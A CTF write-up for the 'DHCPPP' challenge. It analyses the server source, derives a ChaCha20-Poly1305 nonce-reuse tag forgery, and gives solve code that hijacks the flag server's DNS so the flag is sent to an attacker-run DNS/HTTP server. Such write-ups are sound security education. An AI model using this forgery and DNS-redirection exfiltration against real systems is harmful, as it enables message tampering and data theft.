DHCPPP
14 minutes to read
We are given the Python source code of the server that has the flag:
import time, zlib
import secrets
import hashlib
import requests
from Crypto.Cipher import ChaCha20_Poly1305
import dns.resolver
CHACHA_KEY = secrets.token_bytes(32)
TIMEOUT = 1e-1
def encrypt_msg(msg, nonce):
# In case our RNG nonce is repeated, we also hash
# the message in. This means the worst-case scenario
# is that our nonce reflects a hash of the message
# but saves the chance of a nonce being reused across
# different messages
nonce = sha256(msg[:32] + nonce[:32])[:12]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
ct, tag = cipher.encrypt_and_digest(msg)
return ct+tag+nonce
def decrypt_msg(msg):
ct = msg[:-28]
tag = msg[-28:-12]
nonce = msg[-12:]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
pt = cipher.decrypt_and_verify(ct, tag)
return pt
def calc_crc(msg):
return zlib.crc32(msg).to_bytes(4, "little")
def sha256(msg):
return hashlib.sha256(msg).digest()
RNG_INIT = secrets.token_bytes(512)
class DHCPServer:
def __init__(self):
self.leases = []
self.ips = [f"192.168.1.{i}" for i in range(3, 64)]
self.mac = bytes.fromhex("1b 7d 6f 49 37 c9")
self.gateway_ip = "192.168.1.1"
self.leases.append(("192.168.1.2", b"rngserver_0", time.time(), []))
def get_lease(self, dev_name):
if len(self.ips) != 0:
ip = self.ips.pop(0)
self.leases.append((ip, dev_name, time.time(), []))
else:
# relinquish the oldest lease
old_lease = self.leases.pop(0)
ip = old_lease[0]
self.leases.append((ip, dev_name, time.time(), []))
pkt = bytearray(
bytes([int(x) for x in ip.split(".")]) +
bytes([int(x) for x in self.gateway_ip.split(".")]) +
bytes([255, 255, 255, 0]) +
bytes([8, 8, 8, 8]) +
bytes([8, 8, 4, 4]) +
dev_name +
b"\x00"
)
pkt = b"\x02" + encrypt_msg(pkt, self.get_entropy_from_lavalamps()) + calc_crc(pkt)
return pkt
def get_entropy_from_lavalamps(self):
# Get entropy from all available lava-lamp RNG servers
# Falling back to local RNG if necessary
entropy_pool = RNG_INIT
for ip, name, ts, tags in self.leases:
if b"rngserver" in name:
try:
# get entropy from the server
output = requests.get(f"http://{ip}/get_rng", timeout=TIMEOUT).text
entropy_pool += sha256(output.encode())
except:
# if the server is broken, get randomness from local RNG instead
entropy_pool += sha256(secrets.token_bytes(512))
return sha256(entropy_pool)
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
if len(msg) and msg.startswith(b"\x01"):
# lease request
dev_name = msg[1:]
lease_resp = self.get_lease(dev_name)
return (
self.mac +
src_mac + # dest mac
lease_resp
)
else:
return None
class FlagServer:
def __init__(self, dhcp):
self.mac = bytes.fromhex("53 79 82 b5 97 eb")
self.dns = dns.resolver.Resolver()
self.process_pkt(dhcp.process_pkt(self.mac+dhcp.mac+b"\x01"+b"flag_server"))
def send_flag(self):
with open("flag.txt", "r") as f:
flag = f.read().strip()
curl("example.com", f"/{flag}", self.dns)
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
if len(msg) and msg.startswith(b"\x02"):
# lease response
pkt = msg[1:-4]
pkt = decrypt_msg(pkt)
crc = msg[-4:]
assert crc == calc_crc(pkt)
self.ip = ".".join(str(x) for x in pkt[0:4])
self.gateway_ip = ".".join(str(x) for x in pkt[4:8])
self.subnet_mask = ".".join(str(x) for x in pkt[8:12])
self.dns1 = ".".join(str(x) for x in pkt[12:16])
self.dns2 = ".".join(str(x) for x in pkt[16:20])
self.dns.nameservers = [self.dns1, self.dns2]
assert pkt.endswith(b"\x00")
print("[FLAG SERVER] [DEBUG] Got DHCP lease", self.ip, self.gateway_ip, self.subnet_mask, self.dns1, self.dns2)
return None
elif len(msg) and msg.startswith(b"\x03"):
# FREE FLAGES!!!!!!!
self.send_flag()
return None
else:
return None
def curl(url, path, dns):
ip = str(dns.resolve(url).response.resolve_chaining().answer).strip().split(" ")[-1]
url = "http://" + ip
print(f"Sending flage to {url}")
requests.get(url + path)
if __name__ == "__main__":
dhcp = DHCPServer()
flagserver = FlagServer(dhcp)
while True:
pkt = bytes.fromhex(input("> ").replace(" ", "").strip())
out = dhcp.process_pkt(pkt)
if out is not None:
print(out.hex())
out = flagserver.process_pkt(pkt)
if out is not None:
print(out.hex())
Source code analysis
The server allows us to connect using a TCP connection, and we are asked to send a packet:
if __name__ == "__main__":
dhcp = DHCPServer()
flagserver = FlagServer(dhcp)
while True:
pkt = bytes.fromhex(input("> ").replace(" ", "").strip())
out = dhcp.process_pkt(pkt)
if out is not None:
print(out.hex())
out = flagserver.process_pkt(pkt)
if out is not None:
print(out.hex())
The packet we send is processed by both DHCPServer
and FlagServer
, and the response (if any) is printed out.
Analysis of FlagServer
Inside the constructor, we see that it defines a MAC address and uses a dns
object to resolve URLs. Then, it sends a packet to DHCPServer
:
class FlagServer:
def __init__(self, dhcp):
self.mac = bytes.fromhex("53 79 82 b5 97 eb")
self.dns = dns.resolver.Resolver()
self.process_pkt(dhcp.process_pkt(self.mac+dhcp.mac+b"\x01"+b"flag_server"))
The flag is used whenever we send a packet to the FlagServer
where the message part starts with \x03
:
def send_flag(self):
with open("flag.txt", "r") as f:
flag = f.read().strip()
curl("example.com", f"/{flag}", self.dns)
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
# ...
elif len(msg) and msg.startswith(b"\x03"):
# FREE FLAGES!!!!!!!
self.send_flag()
return None
else:
return None
def curl(url, path, dns):
ip = str(dns.resolve(url).response.resolve_chaining().answer).strip().split(" ")[-1]
url = "http://" + ip
print(f"Sending flage to {url}")
requests.get(url + path)
As can be seen, the flag is sent to http://example.com/<flag>
. Notice that the domain example.com
is resolved using the dns
object. Therefore, the objective is to control the nameserver of that dns
object, so that we can tell that example.com
resolves to a URL controlled by us.
Indeed, a message that starts with \x02
can be used to change the dns
settings for the nameservers:
if len(msg) and msg.startswith(b"\x02"):
# lease response
pkt = msg[1:-4]
pkt = decrypt_msg(pkt)
crc = msg[-4:]
assert crc == calc_crc(pkt)
self.ip = ".".join(str(x) for x in pkt[0:4])
self.gateway_ip = ".".join(str(x) for x in pkt[4:8])
self.subnet_mask = ".".join(str(x) for x in pkt[8:12])
self.dns1 = ".".join(str(x) for x in pkt[12:16])
self.dns2 = ".".join(str(x) for x in pkt[16:20])
self.dns.nameservers = [self.dns1, self.dns2]
assert pkt.endswith(b"\x00")
print("[FLAG SERVER] [DEBUG] Got DHCP lease", self.ip, self.gateway_ip, self.subnet_mask, self.dns1, self.dns2)
return None
However, we cannot send this message directly because the payload part of the packet is supposed to be encrypted.
Analysis of DHCPServer
This class is very similar to FlagServer
. This is the constructor:
class DHCPServer:
def __init__(self):
self.leases = []
self.ips = [f"192.168.1.{i}" for i in range(3, 64)]
self.mac = bytes.fromhex("1b 7d 6f 49 37 c9")
self.gateway_ip = "192.168.1.1"
self.leases.append(("192.168.1.2", b"rngserver_0", time.time(), []))
It basically defines some IP addresses, a MAC address and other stuff.
This is the function that processes incoming packets:
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
if len(msg) and msg.startswith(b"\x01"):
# lease request
dev_name = msg[1:]
lease_resp = self.get_lease(dev_name)
return (
self.mac +
src_mac + # dest mac
lease_resp
)
else:
return None
As can be seen, the message part must start with \x01
, and the content is dev_name
, which is passed to get_lease
. The response is sent back, along with MAC addresses.
This is get_lease
:
def get_lease(self, dev_name):
if len(self.ips) != 0:
ip = self.ips.pop(0)
self.leases.append((ip, dev_name, time.time(), []))
else:
# relinquish the oldest lease
old_lease = self.leases.pop(0)
ip = old_lease[0]
self.leases.append((ip, dev_name, time.time(), []))
pkt = bytearray(
bytes([int(x) for x in ip.split(".")]) +
bytes([int(x) for x in self.gateway_ip.split(".")]) +
bytes([255, 255, 255, 0]) +
bytes([8, 8, 8, 8]) +
bytes([8, 8, 4, 4]) +
dev_name +
b"\x00"
)
pkt = b"\x02" + encrypt_msg(pkt, self.get_entropy_from_lavalamps()) + calc_crc(pkt)
return pkt
Basically, the server appends the dev_name
into the leases
list, takes an IP address from the ips
list and uses that to generate the packet. Afterwards, the packet is encrypted, using the result from get_entropy_from_lavalamps
as a key and a CRC code at the end:
def get_entropy_from_lavalamps(self):
# Get entropy from all available lava-lamp RNG servers
# Falling back to local RNG if necessary
entropy_pool = RNG_INIT
for ip, name, ts, tags in self.leases:
if b"rngserver" in name:
try:
# get entropy from the server
output = requests.get(f"http://{ip}/get_rng", timeout=TIMEOUT).text
entropy_pool += sha256(output.encode())
except:
# if the server is broken, get randomness from local RNG instead
entropy_pool += sha256(secrets.token_bytes(512))
return sha256(entropy_pool)
Here we see that if the name of the lease is not rngserver
, then the result will always be the same (the SHA256 hash of RNG_INIT
, which unknown but fixed):
RNG_INIT = secrets.token_bytes(512)
Cipher analysis
These are the functions to encrypt and decrypt:
CHACHA_KEY = secrets.token_bytes(32)
def encrypt_msg(msg, nonce):
# In case our RNG nonce is repeated, we also hash
# the message in. This means the worst-case scenario
# is that our nonce reflects a hash of the message
# but saves the chance of a nonce being reused across
# different messages
nonce = sha256(msg[:32] + nonce[:32])[:12]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
ct, tag = cipher.encrypt_and_digest(msg)
return ct+tag+nonce
def decrypt_msg(msg):
ct = msg[:-28]
tag = msg[-28:-12]
nonce = msg[-12:]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
pt = cipher.decrypt_and_verify(ct, tag)
return pt
The server is using ChaCha20-Poly1305. The vulnerability here is a nonce reuse. Notice that the nonce is generated using a SHA256 hash, and it depends on msg[:32] + nonce[:32]
. Notice that nonce
(as a parameter to encrypt
) here is the result of get_entropy_from_lavalamps
, which is always the same. Therefore, if we force msg[:32]
to be always the same, we will have a nonce-reuse situation.
Solution
We will need to analyze how ChaCha20-Poly1305 works under the hood.
Basically, it is a stream cipher (ChaCha20) combined with a Poly1305 message authentication code.
The use of a stream cipher alone is not safe when you know part of the plaintext, because we can use XOR to get the key stream.
This time, we cannot simply do this because we have Poly1305. So, we need to find a way to generate a valid tag for the encrypted message we want to send to FlagServer
Poly1305 nonce reuse
The way Poly1305 works is by creating a polynomial over the field $\mathbb{F}_p$, where $p = 2^{130} - 5$, which is a prime number.
$$ P(x) = c_1 x^q + c_2 x^{q - 1} + \dots + c_q x \mod{p} $$
Where the coefficients $c_i$ are the bytes of the message to be authenticated in 16-byte blocks. And the tag is generated as:
$$ \mathrm{tag} = \left(P(r) + s\right) \mod{2^{128}} $$
Where $r$ and $s$ are secret key values.
There are some omitted nuances of the cipher, but the key concept of the nonce-reuse attack is that we can get two different tags of two different messages that have the same $r$ and $s$ values because they depend on the key (which is always the same) and the nonce (which we can force to be the same).
As a result, we have
$$ \begin{cases} \mathrm{tag} = \left((c_1 r^q + c_2 r^{q - 1} + \dots + c_q r \mod{p}) + s\right) \mod{2^{128}} \\ \mathrm{tag}' = \left((c'_1 r^q + c'_2 r^{q - 1} + \dots + c'_q r \mod{p}) + s\right) \mod{2^{128}} \end{cases} $$
If we substract both expressions, we can get rid of $s$:
$$ \mathrm{tag} - \mathrm{tag}' = \left((c_1 - c'_1) r^q + (c_2 - c'_2) r^{q - 1} + \dots + (c_q - c'_q) r \mod{p}\right) \mod{2^{128}} $$
Further, we can get rid of $\mod{2^{128}}$ by adding $k \cdot 2^{128}$ for $-4 \leqslant k < 4$:
$$ \mathrm{tag} - \mathrm{tag}' + k \cdot 2^{128} = \left((c_1 - c'_1) r^q + (c_2 - c'_2) r^{q - 1} + \dots + (c_q - c'_q) r \mod{p}\right) $$
The value of $k$ is in that range because the result of the polynomial evaluation is first reduced modulo $p = 2^{130} - 5$, and it holds that $p > 3 \cdot 2^{128}$.
Therefore, we can test these values for $k$ and get candidates for $r$ by finding the roots of the polynomial with coefficients $c_i - c’_i$.
Once we get the value of $r$, getting $s$ is trivial:
$$ s = \mathrm{tag} - \left(c_1 r^q + c_2 r^{q - 1} + \dots + c_q r \mod{p}\right) \mod{2^{128}} \\ $$
At this point, we will be able to encrypt any message and authenticate it correctly, so we will be able to modify the nameservers of the dns
object and get the flag.
Implementation
I will use these helper functions to send/receive packets to/from the DHCPServer
:
def send_recv(data: bytes) -> bytes:
io.sendlineafter(b'> ', data.hex().encode())
return bytes.fromhex(io.recvline().decode())
def parse_enc(enc: bytes):
ct = enc[:-28]
tag = enc[-28:-12]
nonce = enc[-12:]
return ct, tag, nonce
First of all, we empty the ips
list, in order to have more control over the IP address of the leases. Then, we force the nonce-reuse situation (we need that the IP addresses are the same, that’s why we need again $64 - 3$ more queries) using the same first 12 bytes in dev_name
:
io = get_process()
DHCP_MAC = bytes.fromhex('1b 7d 6f 49 37 c9')
FLAG_MAC = bytes.fromhex('53 79 82 b5 97 eb')
for _ in range(3, 64 - 1):
send_recv(b'\0' * 6 + DHCP_MAC + b'\x01' + b'A' * 12)
data1 = send_recv(b'\0' * 6 + DHCP_MAC + b'\x01' + b'A' * 12 + b'B')
for _ in range(3, 64):
send_recv(b'\0' * 6 + DHCP_MAC + b'\x01' + b'A' * 12)
data2 = send_recv(b'\0' * 6 + DHCP_MAC + b'\x01' + b'A' * 12 + b'C')
dst1, src1, lease1 = data1[:6], data1[6:12], data1[12:]
dst2, src2, lease2 = data2[:6], data2[6:12], data2[12:]
assert lease1[0] == lease2[0] == 2
ct1, tag1, nonce1 = parse_enc(lease1[1:-4])
ct2, tag2, nonce2 = parse_enc(lease2[1:-4])
assert nonce1 == nonce2
At this point, we have two different messages ct1
and ct2
with the same nonce.
We can easily get the stream cipher key stream using XOR and a known plaintext:
pkt = bytearray(
bytes([int(x) for x in '192.168.1.2'.split('.')]) +
bytes([int(x) for x in '192.168.1.1'.split('.')]) +
bytes([255, 255, 255, 0]) +
bytes([8, 8, 8, 8]) +
bytes([8, 8, 4, 4]) +
b'A' * 12 + b'B' +
b'\0'
)
assert len(ct1) == len(pkt)
key_stream = xor(ct1, pkt)
Next, we are going to convert the ciphertexts that will be authenticated to the format required by Poly1305 (take a look at pycryptodome for more details):
def update(msg):
return msg + b'\0' * (16 - (len(msg) & 0x0F)) + long_to_bytes(0, 8)[::-1] + long_to_bytes(len(msg), 8)[::-1]
msg1 = update(ct1)
msg2 = update(ct2)
At this point, we can use a symbolic variable $r$ and compute the polynomials for the two tags (it is adapted from python-poly1305):
result1 = int.from_bytes(tag1, 'little')
result2 = int.from_bytes(tag2, 'little')
mod1305 = (1 << 130) - 5
r_sym = PolynomialRing(GF(mod1305), 'r').gens()[0]
q1 = (len(msg1) + 15) // 16
tot1 = 0
for i in range(q1):
sub = msg1[i * 16 : i * 16 + 16] + b'\x01'
sub += (17 - len(sub)) * b'\0'
num = int.from_bytes(sub, 'little')
tot1 = (tot1 + num) * r_sym
q2 = (len(msg2) + 15) // 16
tot2 = 0
for i in range(q2):
sub = msg2[i * 16 : i * 16 + 16] + b'\x01'
sub += (17 - len(sub)) * b'\0'
num = int.from_bytes(sub, 'little')
tot2 = (tot2 + num) * r_sym
Once here, we can test the different $k$ values and find the roots of the polynomials. After some tests, we can see that the $r$ we are looking for is at most a 124-bit integer, which is useful to discard other roots:
possible_r = set()
for k in range(-4, 4 + 1):
roots = (tot1 - tot2 - (result1 - result2) + k * 2 ** 128).roots()
for root, mult in roots:
possible_r.add(int(root))
for r in possible_r:
if int(r).bit_length() <= 124:
break
So, we have $r$ and $s$:
s = (result1 - int(tot1.subs({r_sym: r}))) % (2 ** 128)
io.info(f'{r = }')
io.info(f'{s = }')
At this point, we can forge any encrypted message with a valid authentication tag:
def forge(msg, r, s):
q = (len(msg) + 15) // 16
tot = 0
for i in range(q):
sub = msg[i * 16 : i * 16 + 16] + b'\x01'
sub += (17 - len(sub)) * b'\0'
num = int.from_bytes(sub, 'little')
tot = (tot + num) * r
tot = tot % mod1305
result = (tot + s) % (1 << 128)
return long_to_bytes(result)[::-1]
assert tag1 == forge(update(ct1), r, s)
assert tag2 == forge(update(ct2), r, s)
Finally, we can encrypt the message to modify the nameservers of FlagServer
:
pkt = bytearray(
bytes([127, 0, 0, 1]) +
bytes([0, 0, 0, 0]) +
bytes([255, 255, 255, 0]) +
bytes(int(x) for x in VPS_IP.split('.')) +
bytes(int(x) for x in VPS_IP.split('.')) +
b'A' * 12 + b'X' +
b'\0'
)
crc = calc_crc(pkt)
ct = xor(pkt, key_stream)
tag = forge(update(ct), r, s)
data = b'\0' * 6 + FLAG_MAC + b'\x02' + (ct + tag + nonce1) + crc
io.sendlineafter(b'> ', data.hex().encode())
assert b'DEBUG' in io.recvline()
If everything goes well, we can send the message that starts with \x03
and wait for the flag to arrive:
data = b'\0' * 6 + FLAG_MAC + b'\x03'
io.sendlineafter(b'> ', data.hex().encode())
while not done:
pass
io.close()
os._exit(0)
DNS and HTTP servers
Both DNS (nserver
) and HTTP (Flask) servers are implemented in the same script and run in the background using threads:
done = False
VPS_IP = '12.34.56.78'
dns_server = NameServer('dns', Settings(
console_log_level=logging.FATAL,
server_address='0.0.0.0',
server_port=53,
))
http_server = Flask('http')
logging.getLogger('werkzeug').disabled = True
sys.modules['flask.cli'].show_server_banner = lambda *_: None
@dns_server.rule('example.com', ['A'])
def example_a_records(query: Query):
return A(query.name, VPS_IP)
@http_server.route('/<flag>')
def flag(flag):
global done
log.success(flag)
sleep(1)
done = True
return '', 200
Thread(target=dns_server.run, args=()).start()
Thread(target=http_server.run, kwargs={'host': '0.0.0.0', 'port': 80}).start()
Flag
If we execute the script and everything works fine, we will get the flag:
$ python3 solve.py dhcppp.chal.pwni.ng 1337
[+] Opening connection to dhcppp.chal.pwni.ng on port 1337: Done
[*] r = 212311510927065049612449277573465294
[*] s = 245714001342194252468026868232236808134
[+] PCTF{d0nt_r3u5e_th3_n0nc3_d4839ed727736624}
[*] Closed connection to dhcppp.chal.pwni.ng port 1337
The full script can be found in here: solve.py
.